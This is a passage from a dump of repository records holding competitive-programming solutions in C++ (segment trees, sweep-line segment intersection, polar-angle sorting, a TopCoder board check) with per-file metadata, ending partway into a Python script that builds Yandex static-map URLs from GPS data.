0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\nstatic const long double EPS = 1e-15;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//printTuple\ntemplate<class Tuple, size_t... Is> ostream& print_tuple(ostream& os, const Tuple& t, index_sequence<Is...>) { ((os << (Is == 0 ? \"\" : \" \") << get<Is>(t)), ...); return os; }\ntemplate<class Tuple, size_t... Is> istream& read_tuple(istream& is, Tuple& t, index_sequence<Is...>) { ((is >> get<Is>(t)), ...); return is; }\ntemplate<class... Args> inline ostream& operator<<(ostream& os, const tuple<Args...>& t) { return print_tuple(os, t, index_sequence_for<Args...>{}); }\ntemplate<class... Args> inline istream& operator>>(istream& is, tuple<Args...>& t) { return read_tuple(is, t, index_sequence_for<Args...>{}); }\n\n//binSearch\n//x \\in [l, r]-> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f)\n{\n T m;\n fori(60)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n\n//point\n#define pointtt template<typename T = int>\n//sorts only if z is corner point;\n#define sortByPolarAngle(v, z, T) sort(v.begin(), v.end(), [&z](point<T>& a, point<T>& b) {\\\n int q = orientation(z, a, b); return q == 0 ? dist(z, a) < dist(z, b) : q == -1;\\\n});\n\npointtt struct point\n{\n T x, y;\n point(){}\n point(T _x, T _y) : x(_x), y(_y) {}\n point operator=(const point& b) { x = b.x; y = b.y; return *this; }\n point operator+(const point& b) const { return point(x + b.x, y + b.y); }\n point operator-(const point& b) const { return point(x - b.x, y - b.y); }\n point operator-() const { return point(-x, -y); }\n point operator*(T b) { return point(x * b, y * b); }\n T operator*(const point& b) const { return x * b.x + y * b.y; }\n T operator^(const point& b) const { return x * b.y - y * b.x; }\n T operator!() const { return x * x + y * y; }\n bool operator<(const point& b) const { return x == b.x ? y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,point<T>&a){return os<<a.x<<\" \"<<a.y;}\npointtt T dist(const point<T>&a,const point<T>&b){return!point<T>(a-b);}\n//dist from point C to line AB equals to answer.first / sqrt(answer.second);\npointtt pair<T,T> dist(const point<T>&a,const point<T>&b,const point<T>&c){return{abs((a-b)*c)+(a^b),dist(a,b)};}\nstatic const int CW = 1;\nstatic const int CCW = -1;\npointtt int orientation(const point<T>&a,const point<T>&b,const point<T>&c){T q=(b.x - a.x) * (c.y - a.y) - (b.y - a.y) * (c.x - a.x);return q>EPS?CCW:q<-EPS?CW:0;}\n//reflects point C to line AB (in doubles)\npointtt point<T> reflect(const point<T>&a,const point<T>&b,const point<T>&c){\n T A = a.y - b.y;\n T B = b.x - a.x;\n T C = a ^ b;\n T D = A * A - B * B;\n T S = A * A + B * B;\n return {(-D * c.x - 2 * A * B * c.y - 2 * A * C) / S, (D * c.y - 2 * A * B * c.x - 2 * B * C) / S};\n};\n\n//}}}\n\ntemplate<typename T>\nstruct segment\n{\n point<T> p, q;\n int i;\n\n\tT get_y(T x) const {\n\t\tif (abs(p.x - q.x) < EPS) return p.y;\n\t\treturn p.y + (q.y - p.y) * (x - p.x) / (q.x - p.x);\n\t}\n\n bool operator<(const segment& b) const\n {\n T x = max (min(p.x, q.x), min(b.p.x, b.q.x));\n return get_y(x) < b.get_y(x) - EPS;\n };\n\n friend ostream& operator<<(ostream& os, const segment& s) {\n return os << s.p.x << \" \" << s.p.y << \" \" << s.q.x << \" \" << s.q.y << \" \" << s.i;\n };\n};\n\ntemplate<typename T>\nstruct event {\n T x;\n int type;\n int i;\n\n bool operator<(const event& b) const {\n if (abs(x - b.x) > EPS)\n return x < b.x;\n return type < b.type;\n };\n};\n\ntypedef long double T;\ntypedef point<T> p;\n\ninline bool intersect1d(T l1, T r1, T l2, T r2) {\n\tif (l1 > r1) swap(l1, r1);\n\tif (l2 > r2) swap(l2, r2);\n\treturn max(l1, l2) <= min(r1, r2) + EPS;\n}\n\nvoid run()\n{\n ints(n);\n vector<tuple<p, p, int>> cars(n);\n readln(cars);\n cout << fixed << setprecision(15);\n const T mx = 1e10;\n //const T mx = 100;\n T m = binSearch(T(0), mx, [&](T t) {\n vector<event<T>> events;\n vector<segment<T>> segments(n);\n fori(n)\n {\n auto [f, d, speed] = cars[i];\n auto s = f + d * (speed * t / sqrt(!d));\n events.pb({min(f.x, s.x), -1, i});\n events.pb({max(f.x, s.x), 1, i});\n segments[i] = {f, s, i};\n }\n sort(all(events));\n set<segment<T>> s;\n using it = decltype(s.begin());\n vector<it> iterators(n);\n\n auto prev = [&](auto it) {\n return it == s.begin() ? s.end() : --it;\n };\n auto next = [&](auto it) {\n return ++it;\n };\n auto vec = [&](const p& a, const p& b, const p& c) {\n double s = (b.x - a.x) * (c.y - a.y) - (b.y - a.y) * (c.x - a.x);\n return abs(s) < EPS ? 0 : s > 0 ? +1 : -1;\n };\n auto intersects = [&](it A, const segment<T>& b) {\n if (A == s.end())\n return false;\n auto a = *A;\n\n bool ok = intersect1d(a.p.x, a.q.x, b.p.x, b.q.x)\n && intersect1d(a.p.y, a.q.y, b.p.y, b.q.y)\n && orientation(a.p, a.q, b.p) * orientation(a.p, a.q, b.q) <= 0\n && orientation(b.p, b.q, a.p) * orientation(b.p, b.q, a.q) <= 0;\n return ok;\n };\n for (auto [x, t, id]: events)\n if (t == -1) // begin\n {\n auto nxt = s.lower_bound(segments[id]);\n auto prv = prev(nxt);\n if (intersects(nxt, segments[id]))\n return true;\n if (intersects(prv, segments[id]))\n return true;\n iterators[id] = s.insert(nxt, segments[id]);\n }\n else\n {\n auto nxt = next(iterators[id]);\n auto prv = prev(iterators[id]);\n if (nxt != s.end() && intersects(prv, *nxt))\n return true;\n s.erase(iterators[id]);\n }\n return false;\n });\n if (m == mx)\n writeln(\"No show :(\");\n else\n writeln(m);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4746945798397064, "alphanum_fraction": 0.498036652803421, "avg_line_length": 28.384614944458008, "blob_id": "826aa130d302bc14eebc22c2ced31bb66ca43ff0", "content_id": "37609ab4136cdf0cc909c83bc18b15224224053a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4584, "license_type": "no_license", "max_line_length": 174, "num_lines": 156, "path": "/CodeForce/1326/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//segmentTree\n//0-indexed, [l..r]\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<T> t;\n typedef function<T (T, T)> F;\n F f;\n T NEITRAL_ELEMENT;\n\n void build(vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n t[v] = a[l];\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n t[v] = f(t[v * 2], t[v * 2 + 1]);\n }\n };\n\n segmentTree(vector<T>& a, F g, T ne = 0)\n {\n n = a.size();\n t.resize(n * 4);\n f = g;\n if (ne != 0)\n NEITRAL_ELEMENT = ne;\n else\n if (f(2, 4) == 6)\n NEITRAL_ELEMENT = 0;\n else\n if (f(-2, 10) == -2)\n NEITRAL_ELEMENT = numeric_limits<T>::max();\n build(a, 1, 0, n - 1);\n }\n\n T get(int l, int r)\n {\n return get(1, 0, n - 1, l, r);\n }\n\n T get(int v, int tl, int tr, int l, int r) \n {\n if (l > r)\n return NEITRAL_ELEMENT;\n if (l == tl && r == tr)\n return t[v];\n int tm = (tl + tr) / 2;\n return f(get(v * 2, tl, tm, l, min(r, tm)), get(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r));\n }\n\n void update(int position, T value)\n {\n update(1, 0, n - 1, position, value);\n }\n\n void update(int v, int tl, int tr, int position, T value) \n {\n if (tl == tr)\n t[v] = value;\n else \n {\n int tm = (tl + tr) / 2;\n if (position <= tm)\n update(v * 2, tl, tm, position, value);\n else\n update(v * 2 + 1, tm + 1, tr, position, value);\n t[v] = f(t[v * 2], t[v * 2 + 1]);\n }\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vi p(n), q(n), ans(n), r(n + 1);\n readln(p, q);\n fori(n)\n r[p[i]] = i;\n segmentTree<int> s(p, [](int x, int y) { return max(x, y); }, numeric_limits<int>::min());\n set<int> indices;\n int all = 0;\n fori(n)\n {\n ans[i] = s.get(0, n - 1);\n all = max(all, q[i] - 1);\n int mx = all;\n if (auto it = indices.upper_bound(q[i] - 1); it != indices.end())\n mx = *it;\n int t = s.get(0, mx);\n int x = r[t];\n s.update(x, 0);\n indices.insert(x);\n }\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.2763448655605316, "alphanum_fraction": 0.28739866614341736, "avg_line_length": 30.55813980102539, "blob_id": "f5a4308e4fedce19b4055b8391840f250efa9cee", "content_id": "c109bd49c7b8fe91e363a97787fa4015a2b9c6e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1357, "license_type": "no_license", "max_line_length": 83, "num_lines": 43, "path": "/TopCoder/TC655/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); j++)\n\nusing namespace std;\n\nclass BichromeBoard \n{\npublic:\n string ableToDraw(vector <string> board) \n {\n vector<int> dx = { 1, 0, -1, 0};\n vector<int> dy = { 0, 1, 0, -1};\n int n = board.size();\n int m = board[0].size();\n auto f = [n, m](int i, int j){ return i >= 0 && j >= 0 && i < n && j < m;};\n while (true)\n {\n bool ch = false;\n fori(n)\n forj(m)\n if (board[i][j] != '?')\n {\n char c = board[i][j] == 'W' ? 'B' : 'W';\n for (int u = 0; u < 4; u++)\n if (f(i + dx[u], j + dy[u]))\n {\n char d = board[i + dx[u]][j + dy[u]];\n if (d == '?')\n board[i + dx[u]][j + dy[u]] = c,\n ch = true;\n else\n if (d != c)\n return \"Impossible\";\n }\n }\n if (!ch)\n break;\n }\n return \"Possible\";\n }\n};\n" }, { "alpha_fraction": 0.40578359365463257, "alphanum_fraction": 0.4253731369972229, "avg_line_length": 26.090251922607422, "blob_id": "453f64e9b1801292115d9c16d46be05317a1dc1d", "content_id": "c101113f9f1bc8177d6fc13646c1f8948676ce82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7504, "license_type": "no_license", "max_line_length": 174, "num_lines": 277, "path": "/CodeForce/1758/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//binSearch\n//x \\in [l, r]-> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n\n//segmentTree\n//0-indexed, [l..r]\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<T> t;\n vector<T> add;\n //vector<T> pos;\n function<T(const T&, const T&)> f = [](const T& a, const T& b) { return min(a, b); };\n T NEITRAL_ELEMENT = numeric_limits<T>::max();\n \n void push(int v, int tl, int tr)\n {\n if (add[v] == 0) return;\n\n t[v] += add[v];\n if (tl != tr)\n add[v * 2] += add[v],\n add[v * 2 + 1] += add[v];\n add[v] = 0;\n }\n\n void build(const vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n {\n t[v] = a[l];\n //pos[v] = l;\n }\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n //if (left > right)\n //pos[v] = pos[v * 2];\n //else\n //pos[v] = pos[v * 2 + 1];\n t[v] = f(left, right);\n }\n };\n \n segmentTree(const vector<T>& a)\n {\n n = a.size();\n t.resize(n * 4 + 10);\n add.resize(n * 4 + 10, 0);\n //pos.resize(n * 4 + 10, 0);\n build(a, 1, 0, n - 1);\n }\n \n void update(int l, int r, T value)\n {\n update(1, 0, n - 1, l, r, value);\n }\n \n void update(int v, int tl, int tr, int l, int r, T value) \n {\n push(v, tl, tr);\n if (l > r)\n return;\n if (tl == l && tr == r)\n {\n t[v] += value;\n if (tl != tr)\n add[v * 2] += value,\n add[v * 2 + 1] += value;\n }\n else \n {\n int tm = (tl + tr) / 2;\n update(v * 2, tl, tm, l, min(r, tm), value);\n update(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r, value);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n //if (left > right)\n //pos[v] = pos[v * 2];\n //else\n //pos[v] = pos[v * 2 + 1];\n t[v] = f(left, right);\n }\n }\n\n T get(int l, int r)\n {\n return get(1, 0, n - 1, l, r);\n }\n\n T get(int v, int tl, int tr, int l, int r) \n {\n push(v, tl, tr);\n if (l > r) return NEITRAL_ELEMENT;\n\n if (tl == l && tr == r)\n return t[v];\n else \n {\n int tm = (tl + tr) / 2;\n T left = get(v * 2, tl, tm, l, min(r, tm));\n T right = get(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r);\n return f(left, right);\n }\n }\n\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n int N = n * 2;\n vi a(N + 10, 0);\n set<pii> segments;\n segmentTree<int> tree(a);\n fori(N)\n tree.update(i, N, -1);\n\n auto getSegment = [&](int x) -> optional<pii> {\n if (segments.empty())\n return {};\n auto it = segments.lower_bound({x + 1, x + 1});\n if (it == segments.begin())\n return {};\n --it;\n if (it->second >= x)\n return *it;\n return {};\n };\n\n fori(n)\n {\n ints(x); --x;\n vector<pii> add, rem;\n auto it = getSegment(x);\n\n if (a[x] == 0)\n {\n a[x] = 1;\n tree.update(x, N, 2);\n\n int l = x;\n int r = x;\n if (it)\n {\n l = it->first;\n r = it->second;\n rem.pb(*it);\n }\n\n if (auto prev = getSegment(x - 1); prev && prev->second == x - 1)\n {\n l = prev->first;\n rem.pb(*prev);\n }\n\n forn(q, it ? 2 : 1)\n {\n ++r;\n if (auto nxt = getSegment(r); nxt && nxt->first == r)\n {\n r = nxt->second + 1;\n rem.pb(*nxt);\n }\n }\n\n if (auto nxt = getSegment(r + 1); nxt)\n {\n r = nxt->second;\n rem.pb(*nxt);\n }\n add.pb({l, r});\n }\n else\n {\n a[x] = 0;\n tree.update(x, N, -2);\n int l = it->first;\n int r = it->second;\n if (r - l > 2)\n {\n int p = l == 0 ? 0 : tree.get(l - 1, l - 1);\n int m = binSearch(l, r, [&](int m) {\n return tree.get(l, m) - p <= -2;\n });\n if (m - 2 > l)\n add.pb({l, m - 2});\n if (m + 1 < r)\n add.pb({m + 1, r});\n }\n\n rem.pb(*it);\n }\n\n writeln(rem.size());\n for (auto& [x, y]: rem) segments.erase({x, y}), ++x, ++y;\n if (rem.size()) writeln(rem);\n writeln(add.size());\n for (auto& [x, y]: add) segments.insert({x, y}), ++x, ++y;\n if (add.size()) writeln(add);\n cout.flush();\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.3063241243362427, "alphanum_fraction": 0.3379446566104889, "avg_line_length": 23.119047164916992, "blob_id": "899bb5d376d37081326ee06c891b1caa8569a152", "content_id": "1dfd34729ee23a1a17a8f49be128c6d014e7300c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1012, "license_type": "no_license", "max_line_length": 64, "num_lines": 42, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.27/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n \nusing namespace std;\n \nconst int MaxN = 1000239;\nmap <int, int> m;\nint a[MaxN], t, n, m1, ht[MaxN], x;\npair<int, int> h[MaxN];\nint main(){\n cin >> t;\n while (t --> 0){\n cin >> n >> m1;\n for (int i = 0; i < n; ++i){\n cin >> ht[i];\n h[i] = make_pair(ht[i], i);\n }\n sort (h, h + n);\n int cnt = 0;\n for (int i = n - 1; i >= 0; i--){\n int num = h[i].second, height = h[i].first, ssd = 0;\n if (num && ht[num - 1] >= height){\n ssd++;\n }\n if (num != n - 1 && ht[num + 1] > height){\n ssd++;\n }\n if (!ssd)\n cnt++;\n if (ssd == 2)\n cnt--;\n m[height] = cnt;\n }\n m[1000000009] = 0;\n while(m1 --> 0){\n cin >> x;\n int c = (m.upper_bound(x))->first;\n cout << m[c] << \" \";\n }\n m.clear();\n cout << endl;\n }\n}" }, { "alpha_fraction": 0.5519927740097046, "alphanum_fraction": 0.564673900604248, "avg_line_length": 32.05389404296875, "blob_id": "d217f3f3dcffc7adb1f358b1ccbb02b5925e8f9e", "content_id": "349bf0abcc730d6c98bd29bb9db908595ea1420b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5520, "license_type": "no_license", "max_line_length": 165, "num_lines": 167, "path": "/CodeForce/gym/101104/K.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\n//point\n#define pointtt template<typename T>\n//sorts only if z is corner point;\n#define sortByPolarAngle(v, z, T) sort(v.begin(), v.end(), [&z](point<T>& a, point<T>& b) {\\\n int q = orientation(z, a, b); return q == 0 ? (a.begin == b.begin ? dist(z, a) < dist(z, b) : a.begin > b.begin) : q == -1;\\\n});\n\npointtt struct point\n{\n T x, y;\n int begin;\n point(T _x, T _y) : x(_x), y(_y) {}\n point(){}\n point operator+(point b) { return point(x + b.x, y + b.y); }\n point operator-() { return point(-x, -y); }\n T operator*(point b) { return x * b.x + y * b.y; }\n T operator^(point b) { return x * b.y - y * b.x; }\n T operator!() { return x * x + y * y; }\n bool operator<(point b) { return x == b.x ? y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,point<T>&a){return os<<a.x<<\" \"<<a.y<<\" \"<<a.begin;}\npointtt T dist(point<T>&a,point<T>&b){return!point<T>(a+-b);}\n//dist from point C to line AB equals to answer.first / sqrt(answer.second);\npointtt pair<T,T> dist(point<T>&a,point<T>&b,point<T>&c){return{abs((a+-b)*c)+(a^b),dist(a,b)};}\npointtt int orientation(point<T>&a,point<T>&b,point<T>&c){T q=a.x*b.y-a.y*b.x-a.x*c.y+a.y*c.x+b.x*c.y-b.y*c.x;return q>0?1:q<0?-1:0;}\n//Igorjan\n\nvoid run()\n{\n ints(n);\n point<int> light;\n vector<pair<point<int>, point<int>>> segments(n);\n readln(light);\n if (n == 0)\n {\n writeln(1);\n return;\n }\n readln(segments);\n vector<point<int>> points;\n fori(n)\n {\n if (orientation(light, segments[i].first, segments[i].second) == 1)\n swap(segments[i].first, segments[i].second);\n\n segments[i].first.begin = 1;\n segments[i].second.begin = -1;\n points.pb(segments[i].first);\n points.pb(segments[i].second);\n }\n sortByPolarAngle(points, light, int);\n int b = 0;\n int ans = 1;\n fori(points.size())\n {\n b += points[i].begin;\n ans += b == 0;\n }\n writeln(ans);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n ints(t);\n fori(t)\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5469561219215393, "alphanum_fraction": 0.569136381149292, "avg_line_length": 34.61344528198242, "blob_id": "140c60763f754cfc33d5e34b71dffec4c4ee99ec", "content_id": "4ff4e26e094312e3ecfc917d4d486faae73f815e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4238, "license_type": "no_license", "max_line_length": 192, "num_lines": 119, "path": "/scripts/sonyToYandex.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import xmltodict\nimport re\nimport os\nimport time\nimport datetime\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom library import *\n\nurl = 'https://static-maps.yandex.ru/1.x/?lang=ru_RU&l=map&pl='\n\ndef degsToDegs(f):\n degs = int(f[:2])\n mins = int(f[2:4])\n secs = int(f[5:7])\n msecs = int(f[7:9])\n return degs + mins / 60 + secs / 60 / 100 + msecs / 60 / 100 / 100\n\ndef getTimeFromString(s, format):\n return 